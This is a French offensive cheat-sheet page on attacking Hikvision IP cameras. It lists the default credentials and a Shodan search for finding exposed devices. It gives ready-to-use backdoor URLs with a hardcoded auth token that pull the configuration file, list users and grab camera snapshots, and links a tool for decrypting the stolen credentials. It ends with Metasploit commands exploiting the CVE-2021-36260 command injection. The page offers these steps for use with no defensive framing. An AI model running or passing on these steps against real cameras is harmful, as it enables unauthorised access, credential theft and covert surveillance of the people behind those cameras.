📹Camera IP

Hikvision

Identifiants par défaut

admin:12345

Backdoor

Détection

https://www.shodan.io/search?query=%22App-webs%22+%22200+OK%22

Exploitation

Les commandes intéressantes sont les suivantes:

#Extraction du fichier de configuration
http://XX.XX.XX.XX/System/configurationFile?auth=YWRtaW46MTEK

#Lister les utilisateurs et leur rôle
http://XX.XX.XX.XX/Security/users?auth=YWRtaW46MTEK

#Prendre un snapshot
http://XX.XX.XX.XX/onvif-http/snapshot?auth=YWRtaW46MTEK

Pour aller plus loin, il est possible de prendre le contrôle des caméras vulnérables en déchiffrer le fichier de configuration extrait dans lequel se trouve les identifiants des utilisateurs.

ressource: https://github.com/WormChickenWizard/hikvision-decrypter

Unauthenticated Command Injection

CVE-2021-36260: Une vulnérabilité d'injection de commande dans le serveur Web de certains produits Hikvision. En raison de la validation insuffisante des entrées, l'attaquant peut exploiter la vulnérabilité pour lancer une attaque par injection de commande en envoyant des messages avec des commandes malveillantes.

Exploitation

Avec metasploit:

$ msfconsole

msf > use exploit/linux/http/hikvision_cve_2021_36260_blind
msf > set rhost <target IP>
msf > set rport <target port>
msf > exploit

Dernière mise à jour